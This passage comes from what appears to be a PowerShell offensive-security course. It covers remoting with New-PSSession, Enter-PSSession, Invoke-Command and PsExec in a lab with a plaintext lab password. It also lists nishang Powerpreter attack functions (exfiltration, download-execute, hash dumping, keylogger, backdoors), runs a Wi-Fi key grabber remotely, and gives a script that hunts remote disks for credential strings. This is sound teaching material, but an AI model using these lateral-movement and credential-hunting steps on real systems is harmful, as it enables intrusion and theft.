Microsoft.PowerShell.Core Ends an interactive session with a remote computer.\nNew-PSSessionOption Cmdlet Microsoft.PowerShell.Core Creates an object that contains advanced options for a PSSession.\nNew-PSSessionConfigurationFile Cmdlet Microsoft.PowerShell.Core Creates a file that defines a session configuration.\nTest-PSSessionConfigurationFile Cmdlet Microsoft.PowerShell.Core Verifies the keys and values in a session configuration file.\nExport-PSSession Cmdlet Microsoft.PowerShell.U... Imports commands from another session and saves them in a Windows PowerShell module.\nImport-PSSession Cmdlet Microsoft.PowerShell.U... Imports commands from another session into the current session.\nGet-CimSession Cmdlet CimCmdlets Get-CimSession...\nNew-CimSession Cmdlet CimCmdlets New-CimSession...\nNew-CimSessionOption Cmdlet CimCmdlets New-CimSessionOption...\nRemove-CimSession Cmdlet CimCmdlets Remove-CimSession...\nGet-IscsiSession Function iSCSI ...\nRegister-IscsiSession Function iSCSI ...\nUnregister-IscsiSession Function iSCSI ...\nNew-WSManSessionOption Cmdlet Microsoft.WSMan.Manage... Creates a WS-Management session option hash table to use as input parameters to the following WS-Management cmdlets: Get-WSManIns...\nGet-DtcTransactionsTraceSession Function MsDtc ...\nSet-DtcTransactionsTraceSession Function MsDtc ...\nStart-DtcTransactionsTraceSession Function MsDtc ...\nStop-DtcTransactionsTraceSession Function MsDtc ...\nWrite-DtcTransactionsTraceSession Function MsDtc ...\nNew-NetEventSession Function NetEventPacketCapture ...\nRemove-NetEventSession Function NetEventPacketCapture ...\nGet-NetEventSession Function NetEventPacketCapture ...\nSet-NetEventSession Function NetEventPacketCapture ...\nStart-NetEventSession Function NetEventPacketCapture ...\nStop-NetEventSession Function NetEventPacketCapture ...\nGet-NetNatSession Function NetNat ...\nDisconnect-NfsSession Function NFS ...\nGet-NfsSession Function NFS ...\nNew-PSWorkflowSession Function PSWorkflow ...\nNew-RDSessionDeployment Function RemoteDesktop ...\nGet-RDSessionCollection Function RemoteDesktop ...\nRemove-RDSessionCollection Function RemoteDesktop ...\nNew-RDSessionCollection Function RemoteDesktop ...\nGet-RDSessionHost Function RemoteDesktop ...\nSet-RDSessionHost Function RemoteDesktop ...\nRemove-RDSessionHost Function RemoteDesktop ...\nAdd-RDSessionHost Function RemoteDesktop ...\nGet-RDSessionCollectionConfigu... Function RemoteDesktop ...\nSet-RDSessionCollectionConfigu... Function RemoteDesktop ...\nGet-RDUserSession Function RemoteDesktop ...\nGet-SmbSession Function SmbShare ...\nClose-SmbSession Function SmbShare ...\nNew-TlsSessionTicketKey Cmdlet TLS New-TlsSessionTicketKey...\nEnable-TlsSessionTicketKey Cmdlet TLS Enable-TlsSessionTicketKey...\nDisable-TlsSessionTicketKey Cmdlet TLS Disable-TlsSessionTicketKey...\nExport-TlsSessionTicketKey Cmdlet TLS Export-TlsSessionTicketKey...\nabout_PSSessions HelpFile Describes Windows PowerShell sessions (PSSessions) and explains how to\nabout_PSSession_Details HelpFile Provides detailed information about Windows PowerShell sessions and the\nabout_Remote_Disconnected_Sess... HelpFile Explains how to disconnect from and reconnect to a PSSession\nabout_Session_Configurations HelpFile Describes session configurations, which determine the users who can\nabout_Session_Configuration_Files HelpFile Describes session configuration files, which can be used in a\nabout_CimSession HelpFile Describes a CimSession object and the difference between CIM sessions and\n\nPS C:\\Users\\Administrator>\n```\n\n- In ```Local Machine```\n\n```PowerShell\nPS C:\\Users\\Administrator> $env:COMPUTERNAME\nWIN-2012-DC\nPS C:\\Users\\Administrator> $env:USERDOMAIN\nPFPT\nPS C:\\Users\\Administrator> $env:USERNAME\nAdministrator\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Enable-PSRemoting -Force\nWinRM is already set up to receive requests on this computer.\nWinRM is already set up for remote management on this computer.\nPS C:\\Users\\Administrator>\n```\n\n- In ```Remote Machine```\n\n```PowerShell\nPS C:\\Windows\\system32> $env:COMPUTERNAME\nJOHN-PC\nPS C:\\Windows\\system32> $env:USERDOMAIN\nJohn-PC\nPS C:\\Windows\\system32> $env:USERNAME\nJohn\nPS C:\\Windows\\system32>\n```\n\n```PowerShell\nPS C:\\Windows\\system32> Enable-PSRemoting -Force\nWinRM already is set up to receive requests on this machine.\nWinRM already is set up for remote management on this machine.\nPS C:\\Windows\\system32>\n```\n\n- ```New-PSSession```\n\n```PowerShell\nPS C:\\Users\\Administrator> New-PSSession -ComputerName JOHN-PC -Credential John-PC\\John\n\n Id Name ComputerName State ConfigurationName Availability\n -- ---- ------------ ----- ----------------- ------------\n 1 Session1 JOHN-PC Opened Microsoft.PowerShell Available\n\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Get-PSSession```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-PSSession\n\n Id Name ComputerName State ConfigurationName Availability\n -- ---- ------------ ----- ----------------- ------------\n 1 Session1 JOHN-PC Opened Microsoft.PowerShell Available\n\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Enter-PSSession```\n\n```PowerShell\nPS C:\\Users\\Administrator> Enter-PSSession -ComputerName JOHN-PC -Credential John-PC\\John\n[JOHN-PC]: PS C:\\Users\\John\\Documents> $env:COMPUTERNAME\nJOHN-PC\n[JOHN-PC]: PS C:\\Users\\John\\Documents> $env:USERDOMAIN\nJohn-PC\n[JOHN-PC]: PS C:\\Users\\John\\Documents> $env:USERNAME\nJohn\n[JOHN-PC]: PS C:\\Users\\John\\Documents>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Enter-PSSession -Id 1\n[JOHN-PC]: PS C:\\Users\\John\\Documents> whoami\njohn-pc\\john\n[JOHN-PC]: PS C:\\Users\\John\\Documents> $env:COMPUTERNAME\nJOHN-PC\n[JOHN-PC]: PS C:\\Users\\John\\Documents> $env:USERDOMAIN\nJohn-PC\n[JOHN-PC]: PS C:\\Users\\John\\Documents> $env:USERNAME\nJohn\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-Process\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 23 2 1756 2156 30 0.00 1288 cmd\n 40 3 708 3192 42 0.04 1220 conhost\n 39 3 1468 4036 43 0.06 2496 conhost\n 415 5 1112 2404 33 0.09 352 csrss\n 214 6 1196 3600 32 0.40 408 csrss\n 76 3 892 3544 32 0.03 3672 dllhost\n 66 3 892 3252 38 0.02 912 dwm\n 821 25 25344 38764 219 2.81 696 explorer\n 0 0 0 12 0 0 Idle\n 741 13 3040 7516 32 0.76 492 lsass\n 196 5 1604 3608 23 0.06 500 lsm\n 56 3 868 4248 57 0.06 3160 notepad\n 501 12 23172 33576 165 0.49 2476 powershell\n 134 5 6272 9764 63 0.12 2924 python\n 626 15 18692 10972 85 0.45 1664 SearchIndexer\n 193 7 4100 5844 35 0.65 476 services\n 29 1 216 548 4 0.06 272 smss\n 280 9 4312 5884 57 0.02 1356 spoolsv\n 350 7 2868 5940 35 0.30 624 svchost\n 267 8 2168 4848 26 0.24 736 svchost\n 548 13 14856 12548 77 0.36 788 svchost\n 512 12 22584 27856 99 2.41 872 svchost\n 1150 30 14364 22076 106 1.62 960 svchost\n 456 17 5932 9784 55 0.36 1124 svchost\n 690 26 11620 10904 79 0.40 1232 svchost\n 305 24 9636 9264 48 0.53 1392 svchost\n 359 15 4960 8800 67 0.15 1500 svchost\n 356 36 144368 18092 210 10.70 1956 svchost\n 349 13 8020 9796 64 0.53 2772 svchost\n 96 7 1056 3856 25 0.03 3816 svchost\n 568 0 44 552 2 4 System\n 138 8 1972 4428 38 0.05 1292 taskhost\n 117 5 1524 3460 44 0.10 684 VBoxService\n 140 5 1236 4400 61 0.03 2104 VBoxTray\n 74 5 780 2620 32 0.23 400 wininit\n 113 4 1492 3620 39 0.27 448 winlogon\n 452 16 7468 7376 108 0.32 556 wmpnetwk\n 283 11 41784 51948 161 1.04 3768 wsmprovhost\n\n[JOHN-PC]: PS C:\\Users\\John\\Documents> exit\nPS C:\\Users\\Administrator>\n```\n\n- ```Remove-PSSession```\n\n```PowerShell\nPS C:\\Users\\Administrator> Remove-PSSession -id 1\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-PSSession\n```\n\n###### Exercise\n\n- Try connecting a PS Session to a VM.\n - Refer above for - ```New-PSSession```, ```Get-PSSession```, ```Enter-PSSession```, ```Remove-PSSession```\n- Compare ```Enter-PSSession``` to ```PsExec```. [Think over pros and cons.](https://4sysops.com/archives/psexec-vs-the-powershell-remoting-cmdlets-invoke-command-and-enter-pssession/#psexec-vs-powershell-remoting)\n- Which one do you find easier to use as an attacker?\n- What are the detection rates?\n\n\t- ```Enter-PSSession```\n\t\n \t```PowerShell\n\tPS C:\\Users\\Administrator> Enter-PSSession -ComputerName JOHN-PC -Credential John-PC\\John\n\t[JOHN-PC]: PS C:\\Users\\John\\Documents> $env:COMPUTERNAME\n\tJOHN-PC\n\t[JOHN-PC]: PS C:\\Users\\John\\Documents> $env:USERDOMAIN\n\tJohn-PC\n\t[JOHN-PC]: PS C:\\Users\\John\\Documents> $env:USERNAME\n\tJohn\n\t[JOHN-PC]: PS C:\\Users\\John\\Documents>\n\t``` \n\t\n\n\t- ```PsExec```\n\n\t```Remote Machine```\n\n\t```PowerShell\n\tPS C:\\Windows\\system32> $env:COMPUTERNAME\n\tJOHN-PC\n\tPS C:\\Windows\\system32> $env:USERDOMAIN\n\tJohn-PC\n\tPS C:\\Windows\\system32> $env:USERNAME\n\tJohn\n\tPS C:\\Windows\\system32>\n\t```\n\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\SysinternalsSuite> .\\PsExec.exe \\\\JOHN-PC -u John-PC\\John cmd\n\t\n\tPsExec v2.2 - Execute processes remotely\n\tCopyright (C) 2001-2016 Mark Russinovich\n\tSysinternals - www.sysinternals.com\n\t\n\tPassword:\n\t\n\tMicrosoft Windows [Version 6.1.7600]\n\tCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\t\n\tC:\\Windows\\system32>ipconfig\n\t\n\tWindows IP Configuration\n\t\n\t\n\tEthernet adapter Local Area Connection:\n\t\n\t Connection-specific DNS Suffix . : hsd1.ca.comcast.net\n\t IPv6 Address. . . . . . . . . . . : 2601:644:8501:6c87::c308\n\t IPv6 Address. . . . . . . . . . . : 2601:644:8501:6c87:613e:76ef:5029:c2c1\n\t Temporary IPv6 Address. . . . . . : 2601:644:8501:6c87:bc3b:5ba5:fa78:5474\n\t Link-local IPv6 Address . . . . . : fe80::613e:76ef:5029:c2c1%11\n\t IPv4 Address. . . . . . . . . . . : 10.0.0.129\n\t Subnet Mask . . . . . . . . . . . : 255.255.255.0\n\t Default Gateway . . . . . . . . . : fe80::250:f1ff:fe80:0%11\n\t 10.0.0.1\n\t\n\tTunnel adapter isatap.hsd1.ca.comcast.net:\n\t\n\t Media State . . . . . . . . . . . : Media disconnected\n\t Connection-specific DNS Suffix . : hsd1.ca.comcast.net\n\t\n\tTunnel adapter Local Area Connection* 11:\n\t\n\t Connection-specific DNS Suffix . :\n\t IPv6 Address. . . . . . . . . . . : 2001:0:9d38:90d7:2013:2547:b6b9:5698\n\t Link-local IPv6 Address . . . . . : fe80::2013:2547:b6b9:5698%13\n\t Default Gateway . . . . . . . . . :\n\t\n\tC:\\Windows\\system32>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\SysinternalsSuite> .\\PsExec.exe \\\\JOHN-PC -u John-PC\\John -p Ab12345 cmd\n\t\n\tPsExec v2.2 - Execute processes remotely\n\tCopyright (C) 2001-2016 Mark Russinovich\n\tSysinternals - www.sysinternals.com\n\t\n\t\n\tMicrosoft Windows [Version 6.1.7600]\n\tCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\t\n\tC:\\Windows\\system32>ipconfig\n\t\n\tWindows IP Configuration\n\t\n\t\n\tEthernet adapter Local Area Connection:\n\t\n\t Connection-specific DNS Suffix . : hsd1.ca.comcast.net\n\t IPv6 Address. . . . . . . . . . . : 2601:644:8501:6c87::c308\n\t IPv6 Address. . . . . . . . . . . : 2601:644:8501:6c87:613e:76ef:5029:c2c1\n\t Temporary IPv6 Address. . . . . . : 2601:644:8501:6c87:bc3b:5ba5:fa78:5474\n\t Link-local IPv6 Address . . . . . : fe80::613e:76ef:5029:c2c1%11\n\t IPv4 Address. . . . . . . . . . . : 10.0.0.129\n\t Subnet Mask . . . . . . . . . . . : 255.255.255.0\n\t Default Gateway . . . . . . . . . : fe80::250:f1ff:fe80:0%11\n\t 10.0.0.1\n\t\n\tTunnel adapter isatap.hsd1.ca.comcast.net:\n\t\n\t Media State . . . . . . . . . . . : Media disconnected\n\t Connection-specific DNS Suffix . : hsd1.ca.comcast.net\n\t\n\tTunnel adapter Local Area Connection* 11:\n\t\n\t Connection-specific DNS Suffix . :\n\t IPv6 Address. . . . . . . . . . . : 2001:0:9d38:90d7:2013:2547:b6b9:5698\n\t Link-local IPv6 Address . . . . . : fe80::2013:2547:b6b9:5698%13\n\t Default Gateway . . . . . . . . . :\n\t\n\tC:\\Windows\\system32>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\SysinternalsSuite> .\\PsExec.exe -h\n\t\n\tPsExec v2.2 - Execute processes remotely\n\tCopyright (C) 2001-2016 Mark Russinovich\n\tSysinternals - www.sysinternals.com\n\t\n\tPsExec executes a program on a remote system, where remotely executed console\n\tapplications execute interactively.\n\t\n\tUsage: psexec [\\\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-r servicename][-h][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-][-a n,n,...] cmd [arguments]\n\t -a Separate processors on which the application can run with\n\t commas where 1 is the lowest numbered CPU. For example,\n\t to run the application on CPU 2 and CPU 4, enter:\n\t \"-a 2,4\"\n\t -c Copy the specified program to the remote system for\n\t execution. If you omit this option the application\n\t must be in the system path on the remote system.\n\t -d Don't wait for process to terminate (non-interactive).\n\t -e Does not load the specified account's profile.\n\t -f Copy the specified program even if the file already\n\t exists on the remote system.\n\t -i Run the program so that it interacts with the desktop of the\n\t specified session on the remote system. If no session is\n\t specified the process runs in the console session.\n\t -h If the target system is Vista or higher, has the process\n\t run with the account's elevated token, if available.\n\t -l Run process as limited user (strips the Administrators group\n\t and allows only privileges assigned to the Users group).\n\t On Windows Vista the process runs with Low Integrity.\n\t -n Specifies timeout in seconds connecting to remote computers.\n\t -p Specifies optional password for user name. If you omit this\n\t you will be prompted to enter a hidden password.\n\t -r Specifies the name of the remote service to create or interact.\n\t with.\n\t -s Run the remote process in the System account.\n\t -u Specifies optional user name for login to remote\n\t computer.\n\t -v Copy the specified file only if it has a higher version number\n\t or is newer on than the one on the remote system.\n\t -w Set the working directory of the process (relative to\n\t remote computer).\n\t -x Display the UI on the Winlogon secure desktop (local system\n\t only).\n\t -arm Specifies the remote computer is of ARM architecture.\n\t -priority Specifies -low, -belownormal, -abovenormal, -high or\n\t -realtime to run the process at a different priority. Use\n\t -background to run at low memory and I/O priority on Vista.\n\t computer Direct PsExec to run the application on the remote\n\t computer or computers specified. If you omit the computer\n\t name PsExec runs the application on the local system,\n\t and if you specify a wildcard (\\\\*), PsExec runs the\n\t command on all computers in the current domain.\n\t @file PsExec will execute the command on each of the computers listed\n\t in the file.\n\t cmd Name of application to execute.\n\t arguments Arguments to pass (note that file paths must be\n\t absolute paths on the target system).\n\t -accepteula This flag suppresses the display of the license dialog.\n\t -nobanner Do not display the startup banner and copyright message.\n\t\n\tYou can enclose applications that have spaces in their name with\n\tquotation marks e.g. psexec \\\\marklap \"c:\\long name app.exe\".\n\tInput is only passed to the remote system when you press the enter\n\tkey, and typing Ctrl-C terminates the remote process.\n\t\n\tIf you omit a user name the process will run in the context of your\n\taccount on the remote system, but will not have access to network\n\tresources (because it is impersonating). Specify a valid user name\n\tin the Domain\\User syntax if the remote process requires access\n\tto network resources or to run in a different account. Note that\n\tthe password and command is encrypted in transit to the remote system.\n\t\n\tError codes returned by PsExec are specific to the applications you\n\texecute, not PsExec.\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\SysinternalsSuite>\n\t```\n" }, { "path": "23-Powershell-Remoting-Part-4.md", "content": "#### 23. Powershell Remoting Part 4\n\n###### PowerShell Remoting – One-to-Many\n\n- ```Invoke-Command```\n\n - Running ```Commands```\n \n\t```PowerShell\n\tPS C:\\Users\\Administrator> Invoke-Command -ScriptBlock {whoami;(Get-Host).Version;Get-Process} -ComputerName JOHN-PC -Credential John-PC\\John\n\tjohn-pc\\john\n\t\n\tMajor Minor Build Revision PSComputerName\n\t----- ----- ----- -------- --------------\n\t1 0 0 0 JOHN-PC\n\t\n\tId : 1288\n\tHandles : 23\n\tCPU : 0\n\tName : cmd\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 1552\n\tHandles : 22\n\tCPU : 0.0100144\n\tName : cmd\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 1220\n\tHandles : 40\n\tCPU : 0.050072\n\tName : conhost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 3124\n\tHandles : 34\n\tCPU : 0\n\tName : conhost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 352\n\tHandles : 433\n\tCPU : 0.100144\n\tName : csrss\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 408\n\tHandles : 206\n\tCPU : 0.4706768\n\tName : csrss\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 2920\n\tHandles : 79\n\tCPU : 0.0100144\n\tName : dllhost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 912\n\tHandles : 66\n\tCPU : 0.0200288\n\tName : dwm\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 696\n\tHandles : 786\n\tCPU : 2.9342192\n\tName : explorer\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 0\n\tHandles : 0\n\tCPU :\n\tName : Idle\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 492\n\tHandles : 744\n\tCPU : 0.901296\n\tName : lsass\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 500\n\tHandles : 196\n\tCPU : 0.0701008\n\tName : lsm\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 3160\n\tHandles : 56\n\tCPU : 0.0701008\n\tName : notepad\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 2924\n\tHandles : 134\n\tCPU : 0.1301872\n\tName : python\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 1664\n\tHandles : 627\n\tCPU : 0.50072\n\tName : SearchIndexer\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 476\n\tHandles : 199\n\tCPU : 0.7310512\n\tName : services\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 272\n\tHandles : 29\n\tCPU : 0.0600864\n\tName : smss\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 1356\n\tHandles : 280\n\tCPU : 0.0200288\n\tName : spoolsv\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 624\n\tHandles : 354\n\tCPU : 0.3605184\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 736\n\tHandles : 267\n\tCPU : 0.3304752\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 788\n\tHandles : 550\n\tCPU : 0.50072\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 872\n\tHandles : 514\n\tCPU : 3.50504\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 960\n\tHandles : 1142\n\tCPU : 3.5150544\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 1124\n\tHandles : 452\n\tCPU : 0.4706768\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 1232\n\tHandles : 696\n\tCPU : 0.6609504\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 1392\n\tHandles : 306\n\tCPU : 0.5708208\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 1500\n\tHandles : 349\n\tCPU : 0.200288\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 1956\n\tHandles : 373\n\tCPU : 11.3262864\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 2772\n\tHandles : 344\n\tCPU : 0.9413536\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 3816\n\tHandles : 96\n\tCPU : 0.0300432\n\tName : svchost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 4\n\tHandles : 565\n\tCPU :\n\tName : System\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 1292\n\tHandles : 138\n\tCPU : 0.050072\n\tName : taskhost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 3528\n\tHandles : 149\n\tCPU : 0.0600864\n\tName : taskhost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 684\n\tHandles : 115\n\tCPU : 0.25036\n\tName : VBoxService\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 2104\n\tHandles : 140\n\tCPU : 0.0600864\n\tName : VBoxTray\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 400\n\tHandles : 74\n\tCPU : 0.2303312\n\tName : wininit\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 448\n\tHandles : 113\n\tCPU : 0.2703888\n\tName : winlogon\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 556\n\tHandles : 417\n\tCPU : 0.4105904\n\tName : wmpnetwk\n\tPSComputerName : JOHN-PC\n\t\n\t\n\tId : 3532\n\tHandles : 247\n\tCPU : 0.7711088\n\tName : wsmprovhost\n\tPSComputerName : JOHN-PC\n\t\n\t\n\t\n\tPS C:\\Users\\Administrator>\n\t```\n\n - Running ```Scripts```\n\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop> Invoke-Command -FilePath .\\HelloWorld.ps1 -ComputerName JOHN-PC -Credential John-PC\\John\n\tHello World\n\tPS C:\\Users\\Administrator\\Desktop>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop> Invoke-Command -FilePath .\\nishang-master\\Gather\\Check-VM.ps1 -ComputerName JOHN-PC -Credential John-PC\\John\n\t```\n\n - Running ```Modules```\n \n - Import the ```Module```\n \n\t\t```PowerShell\n\t\tPS C:\\Users\\Administrator\\Desktop> Import-Module .\\nishang-master\\powerpreter\\Powerpreter.psm1\n\t\tWARNING: The names of some imported commands from the module 'Powerpreter' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the\n\t\tImport-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\n\t\tWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\n\t\tPS C:\\Users\\Administrator\\Desktop>\n\t\t```\n\t\t\n\t\t- Check that the ```Module``` is imported\n\n\t\t```PowerShell\n\t\tPS C:\\Users\\Administrator\\Desktop> Get-Module\n\t\t\n\t\tModuleType Version Name ExportedCommands\n\t\t---------- ------- ---- ----------------\n\t\tManifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}\n\t\tManifest 3.0.0.0 Microsoft.PowerShell.Security {ConvertFrom-SecureString, ConvertTo-SecureString, Get-Acl, Get-AuthenticodeSignature...}\n\t\tManifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}\n\t\tManifest 3.0.0.0 Microsoft.WSMan.Management {Connect-WSMan, Disable-WSManCredSSP, Disconnect-WSMan, Enable-WSManCredSSP...}\n\t\tScript 0.0 Powerpreter {Add-ScrnSaveBackdoor, Base64ToString, Check-VM, Copy-VSS...}\n\t\t\n\t\tPS C:\\Users\\Administrator\\Desktop>\n\t\t```\n\t\t\n\t\t- List the ```Functions``` of the ```Module```\n\n\t\t```PowerShell\n\t\tPS C:\\Users\\Administrator\\Desktop> Get-Command -Module Powerpreter\n\t\t\n\t\tCommandType Name ModuleName\n\t\t----------- ---- ----------\n\t\tFunction Add-ScrnSaveBackdoor Powerpreter\n\t\tFunction Base64ToString Powerpreter\n\t\tFunction Check-VM Powerpreter\n\t\tFunction Copy-VSS Powerpreter\n\t\tFunction Create-MultipleSessions Powerpreter\n\t\tFunction DNS_TXT_Pwnage Powerpreter\n\t\tFunction Do-Exfiltration Powerpreter\n\t\tFunction Download Powerpreter\n\t\tFunction Download_Execute Powerpreter\n\t\tFunction Download-Execute-PS Powerpreter\n\t\tFunction Enable-DuplicateToken Powerpreter\n\t\tFunction Execute-Command-MSSQL Powerpreter\n\t\tFunction Execute-DNSTXT-Code Powerpreter\n\t\tFunction Execute-OnTime Powerpreter\n\t\tFunction ExetoText Powerpreter\n\t\tFunction FireBuster Powerpreter\n\t\tFunction FireListener Powerpreter\n\t\tFunction Get-Information Powerpreter\n\t\tFunction Get-LsaSecret Powerpreter\n\t\tFunction Get-PassHashes Powerpreter\n\t\tFunction Get-PassHints Powerpreter\n\t\tFunction Get-Wlan-Keys Powerpreter\n\t\tFunction Gupt-Backdoor Powerpreter\n\t\tFunction HTTP-Backdoor Powerpreter\n\t\tFunction Invoke-BruteForce Powerpreter\n\t\tFunction Invoke-CredentialsPhish Powerpreter\n\t\tFunction Invoke-Decode Powerpreter\n\t\tFunction Invoke-Encode Powerpreter\n\t\tFunction Invoke-NetworkRelay Powerpreter\n\t\tFunction Invoke-PortScan Powerpreter\n\t\tFunction Invoke-PSGcat Powerpreter\n\t\tFunction Invoke-PsGcatAgent Powerpreter\n\t\tFunction Invoke-PsUACme Powerpreter\n\t\tFunction Keylogger Powerpreter\n\t\tFunction Out-CHM Powerpreter\n\t\tFunction Out-DnsTxt Powerpreter\n\t\tFunction Out-Excel Powerpreter\n\t\tFunction Out-HTA Powerpreter\n\t\tFunction Out-Java Powerpreter\n\t\tFunction Out-Shortcut Powerpreter\n\t\tFunction Out-WebQuery Powerpreter\n\t\tFunction Out-Word Powerpreter\n\t\tFunction Persistence Powerpreter\n\t\tFunction Pivot Powerpreter\n\t\tFunction Remove-Persistence Powerpreter\n\t\tFunction Remove-Update Powerpreter\n\t\tFunction StringtoBase64 Powerpreter\n\t\tFunction TexttoEXE Powerpreter\n\t\tFunction Use-Session Powerpreter\n\t\t\n\t\tPS C:\\Users\\Administrator\\Desktop>\n\t\t```\n\t\t\n\t\t- Run the ```Function``` of the ```Module```\n\n\t\t```PowerShell\n\t\tPS C:\\Users\\Administrator\\Desktop> Invoke-Command -ScriptBlock ${Function:Get-WLAN-Keys} -ComputerName JOHN-PC -Credential John-PC\\John\n\t\tYou cannot call a method on a null-valued expression.\n\t\t + CategoryInfo : InvalidOperation: (Replace:String) [], RuntimeException\n\t\t + FullyQualifiedErrorId : InvokeMethodOnNull\n\t\t + PSComputerName : JOHN-PC\n\t\t\n\t\tThe Wireless AutoConfig Service (wlansvc) is not running.\n\t\tPS C:\\Users\\Administrator\\Desktop>\n\t\t```\n\t\t\n- “Fan-Out” or “One-to-Many”\n\n```PowerShell\nInvoke-Command -ScriptBlock {whoami;(Get-Host).Version;Get-Process} -ComputerName , -Credential \\Administrator\n```\n\n```PowerShell\nInvoke-Command -ScriptBlock {whoami;(Get-Host).Version;Get-Process} -ComputerName {Get-Content .\\servers.txt} -Credential \\Administrator\n```\n\n###### Exercise\n\n- Write a ```PowerShell``` script which searches for the presence of strings like ```“password”```, ```“username”``` and ```“credentials”``` in the ```C:\\``` directory.\n\n```Search-Sensitive.ps1```\n\n```PowerShell\n$file = Get-ChildItem -Path C:\\ -Filter *.txt -Recurse\r\n\r\nWrite-Output \"`nFiles Found \" --------------------- $file.Count\r\n\r\nWrite-Output \"`nScript Output \" ---------------------\r\n\r\nSelect-String $file -Pattern username, password, credential\n```\n\n- Run this script on remote machines.\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-Command -FilePath .\\Desktop\\Code\\23\\Search-Sensitive.ps1 -ComputerName JOHN-PC -Credential John-PC\\John\n\n\nFiles Found \n---------------------\n477\n\nScript Output \n---------------------\n\nC:\\Program Files (x86)\\Nmap\\nselib\\data\\enterprise_numbers.txt:42994:43124 PasswordBox Inc.\nC:\\Program Files (x86)\\Nmap\\nselib\\data\\http-folders.txt:563:/password/\nC:\\Program Files (x86)\\Nmap\\nselib\\data\\http-folders.txt:564:/passwords/\nC:\\Program Files (x86)\\Nmap\\nselib\\data\\rtsp-urls.txt:14:/CAM_ID.password.mp2\nC:\\Program Files (x86)\\Nmap\\nselib\\data\\rtsp-urls.txt:178:/user=admin_password=tlJwpbo6_channel=1_stream=0.sdp?real_stream\nC:\\Program Files (x86)\\Nmap\\nselib\\data\\tftplist.txt:167:password.bin\nC:\\Program Files (x86)\\Nmap\\nselib\\data\\tftplist.txt:168:password.cfg\nC:\\Program Files (x86)\\Nmap\\nselib\\data\\tftplist.txt:169:password.ini\nC:\\Python27\\NEWS.txt:4376:- Issue #13642: Unquote before b64encoding user:password during Basic\nC:\\Python27\\NEWS.txt:4796: test_tk or test_ttk_guionly under a username that is not currently logged\nC:\\Python27\\NEWS.txt:7185: long passwords. Initial patch by JP St. Pierre.\nC:\\Python27\\NEWS.txt:7749: TLS with authentication credentials.\nC:\\Python27\\NEWS.txt:11063:- Patch #1698: allow '@' in username parsed by urlparse.py.\nC:\\Python27\\NEWS.txt:11144:- When encountering a password-protected robots.txt file the\nC:\\Python27\\NEWS.txt:11145: RobotFileParser no longer prompts interactively for a username and\nC:\\Python27\\NEWS.txt:11146: password (bug 